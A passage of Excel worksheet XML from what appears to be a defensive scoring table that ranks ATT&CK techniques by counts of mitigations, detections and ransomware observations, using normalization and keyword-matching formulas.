        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y313">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Z313">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA313">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB313">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC313" s="29" t="s">
        <v>1288</v>
      </c>
      <c r="AD313" s="25" t="str" cm="1">
        <f t="array" ref="AD313">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC313)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE313" s="25">
        <f>IF(AD313="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF313" s="25" t="str" cm="1">
        <f t="array" ref="AF313">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC313)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG313" s="25">
        <f>IF(AF313="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH313" s="25" t="str" cm="1">
        <f t="array" ref="AH313">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC313)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI313" s="25">
        <f>IF(AH313="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ313" s="25" t="str" cm="1">
        <f t="array" ref="AJ313">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC313)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK313" s="25">
        <f>IF(AJ313="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL313" s="25" t="str" cm="1">
        <f t="array" ref="AL313">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC313)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM313" s="25">
        <f>IF(AL313="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN313" s="52">
        <v>0</v>
      </c>
      <c r="AO313" s="51">
        <v>0</v>
      </c>
      <c r="AP313" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1033333333333333E-2</v>
      </c>
      <c r="AQ313" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AR313" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AS313" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT313" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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14" spans="1:47" ht="63.95">
      <c r="A314" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1033333333333333E-2</v>
      </c>
      <c r="B314" s="25">
        <f>SUM(H314,M314,V314)*(1+SUM(AE314,AG314,AI314,AK314,AM314))</f>
        <v>0.31033333333333335</v>
      </c>
      <c r="C314" s="25" t="s">
        <v>1289</v>
      </c>
      <c r="D314" s="25" t="s">
        <v>1290</v>
      </c>
      <c r="E314" s="25" t="s">
        <v>1291</v>
      </c>
      <c r="F314" s="51">
        <v>1</v>
      </c>
      <c r="G314" s="51">
        <v>1</v>
      </c>
      <c r="H314" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I314">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J314">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K314">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L314">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M314" s="25">
        <v>0</v>
      </c>
      <c r="N314" s="51">
        <v>0</v>
      </c>
      <c r="O314" s="51">
        <v>0</v>
      </c>
      <c r="P314" s="51">
        <v>0</v>
      </c>
      <c r="Q314" s="51">
        <v>0</v>
      </c>
      <c r="R314" s="53" t="s">
        <v>1182</v>
      </c>
      <c r="S314" s="51">
        <v>6</v>
      </c>
      <c r="T314" s="51" t="s">
        <v>1292</v>
      </c>
      <c r="U314" s="51">
        <v>8</v>
      </c>
      <c r="V314" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W314">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X314">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y314">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z314">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA314">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB314">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC314" s="29" t="s">
        <v>107</v>
      </c>
      <c r="AD314" s="25" t="str" cm="1">
        <f t="array" ref="AD314">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC314)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE314" s="25">
        <f>IF(AD314="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF314" s="25" t="str" cm="1">
        <f t="array" ref="AF314">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC314)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG314" s="25">
        <f>IF(AF314="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH314" s="25" t="str" cm="1">
        <f t="array" ref="AH314">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC314)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI314" s="25">
        <f>IF(AH314="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ314" s="25" t="str" cm="1">
        <f t="array" ref="AJ314">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC314)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK314" s="25">
        <f>IF(AJ314="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL314" s="25" t="str" cm="1">
        <f t="array" ref="AL314">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC314)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM314" s="25">
        <f>IF(AL314="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN314" s="62">
        <v>0</v>
      </c>
      <c r="AO314" s="51">
        <v>0</v>
      </c>
      <c r="AP314" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1033333333333333E-2</v>
      </c>
      <c r="AQ314" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AR314" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AS314" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT314" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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15" spans="1:47" ht="32.1">
      <c r="A315" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1033333333333333E-2</v>
      </c>
      <c r="B315" s="25">
        <f>SUM(H315,M315,V315)*(1+SUM(AE315,AG315,AI315,AK315,AM315))</f>
        <v>0.31033333333333335</v>
      </c>
      <c r="C315" s="25" t="s">
        <v>1293</v>
      </c>
      <c r="D315" s="25" t="s">
        <v>365</v>
      </c>
      <c r="E315" s="25" t="s">
        <v>1294</v>
      </c>
      <c r="F315" s="51">
        <v>1</v>
      </c>
      <c r="G315" s="51">
        <v>1</v>
      </c>
      <c r="H315" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I315">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J315">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K315">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L315">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M315" s="25">
        <v>0</v>
      </c>
      <c r="N315" s="51">
        <v>0</v>
      </c>
      <c r="O315" s="51">
        <v>0</v>
      </c>
      <c r="P315" s="51">
        <v>0</v>
      </c>
      <c r="Q315" s="51">
        <v>0</v>
      </c>
      <c r="R315" s="52" t="s">
        <v>366</v>
      </c>
      <c r="S315" s="51">
        <v>7</v>
      </c>
      <c r="T315" s="51" t="s">
        <v>1279</v>
      </c>
      <c r="U315" s="51">
        <v>7</v>
      </c>
      <c r="V315" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W315">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X315">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y315">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z315">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA315">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB315">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC315" s="29" t="s">
        <v>1295</v>
      </c>
      <c r="AD315" s="25" t="str" cm="1">
        <f t="array" ref="AD315">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC315)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE315" s="25">
        <f>IF(AD315="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF315" s="25" t="str" cm="1">
        <f t="array" ref="AF315">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC315)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG315" s="25">
        <f>IF(AF315="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH315" s="25" t="str" cm="1">
        <f t="array" ref="AH315">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC315)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI315" s="25">
        <f>IF(AH315="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ315" s="25" t="str" cm="1">
        <f t="array" ref="AJ315">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC315)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK315" s="25">
        <f>IF(AJ315="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL315" s="25" t="str" cm="1">
        <f t="array" ref="AL315">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC315)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM315" s="25">
        <f>IF(AL315="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN315" s="58">
        <v>0</v>
      </c>
      <c r="AO315" s="51">
        <v>0</v>
      </c>
      <c r="AP315" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1033333333333333E-2</v>
      </c>
      <c r="AQ315" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AR315" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AS315" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT315" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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16" spans="1:47" ht="32.1">
      <c r="A316" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1033333333333333E-2</v>
      </c>
      <c r="B316" s="25">
        <f>SUM(H316,M316,V316)*(1+SUM(AE316,AG316,AI316,AK316,AM316))</f>
        <v>0.31033333333333335</v>
      </c>
      <c r="C316" s="25" t="s">
        <v>1296</v>
      </c>
      <c r="D316" s="25" t="s">
        <v>365</v>
      </c>
      <c r="E316" s="25" t="s">
        <v>1297</v>
      </c>
      <c r="F316" s="51">
        <v>1</v>
      </c>
      <c r="G316" s="51">
        <v>1</v>
      </c>
      <c r="H316" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I316">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J316">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K316">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L316">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M316" s="25">
        <v>0</v>
      </c>
      <c r="N316" s="51">
        <v>0</v>
      </c>
      <c r="O316" s="51">
        <v>0</v>
      </c>
      <c r="P316" s="51">
        <v>0</v>
      </c>
      <c r="Q316" s="51">
        <v>0</v>
      </c>
      <c r="R316" s="52" t="s">
        <v>366</v>
      </c>
      <c r="S316" s="51">
        <v>7</v>
      </c>
      <c r="T316" s="51" t="s">
        <v>1279</v>
      </c>
      <c r="U316" s="51">
        <v>7</v>
      </c>
      <c r="V316" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W316">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X316">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y316">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z316">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA316">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB316">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC316" s="29" t="s">
        <v>368</v>
      </c>
      <c r="AD316" s="25" t="str" cm="1">
        <f t="array" ref="AD316">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC316)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE316" s="25">
        <f>IF(AD316="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF316" s="25" t="str" cm="1">
        <f t="array" ref="AF316">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC316)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG316" s="25">
        <f>IF(AF316="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH316" s="25" t="str" cm="1">
        <f t="array" ref="AH316">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC316)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI316" s="25">
        <f>IF(AH316="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ316" s="25" t="str" cm="1">
        <f t="array" ref="AJ316">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC316)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK316" s="25">
        <f>IF(AJ316="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL316" s="25" t="str" cm="1">
        <f t="array" ref="AL316">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC316)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM316" s="25">
        <f>IF(AL316="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN316" s="59">
        <v>0</v>
      </c>
      <c r="AO316" s="51">
        <v>0</v>
      </c>
      <c r="AP316" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1033333333333333E-2</v>
      </c>
      <c r="AQ316" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AR316" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AS316" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT316" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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17" spans="1:47" ht="32.1">
      <c r="A317" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6413333333333341E-2</v>
      </c>
      <c r="B317" s="25">
        <f>SUM(H317,M317,V317)*(1+SUM(AE317,AG317,AI317,AK317,AM317))</f>
        <v>0.26413333333333339</v>
      </c>
      <c r="C317" s="25" t="s">
        <v>1298</v>
      </c>
      <c r="D317" s="25" t="s">
        <v>283</v>
      </c>
      <c r="E317" s="25" t="s">
        <v>1299</v>
      </c>
      <c r="F317" s="51">
        <v>1</v>
      </c>
      <c r="G317" s="51">
        <v>1</v>
      </c>
      <c r="H317" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I317">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J317">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K317">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L317">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M317" s="25">
        <v>0</v>
      </c>
      <c r="N317" s="51">
        <v>0</v>
      </c>
      <c r="O317" s="51">
        <v>2</v>
      </c>
      <c r="P317" s="51">
        <v>0</v>
      </c>
      <c r="Q317" s="51">
        <v>0</v>
      </c>
      <c r="R317" s="52" t="s">
        <v>284</v>
      </c>
      <c r="S317" s="51">
        <v>5</v>
      </c>
      <c r="T317" s="51" t="s">
        <v>157</v>
      </c>
      <c r="U317" s="51">
        <v>8</v>
      </c>
      <c r="V317" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W317">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X317">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y317">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z317">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA317">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB317">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC317" s="29" t="s">
        <v>285</v>
      </c>
      <c r="AD317" s="25" t="str" cm="1">
        <f t="array" ref="AD317">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC317)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE317" s="25">
        <f>IF(AD317="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF317" s="25" t="str" cm="1">
        <f t="array" ref="AF317">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC317)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG317" s="25">
        <f>IF(AF317="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH317" s="25" t="str" cm="1">
        <f t="array" ref="AH317">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC317)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI317" s="25">
        <f>IF(AH317="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
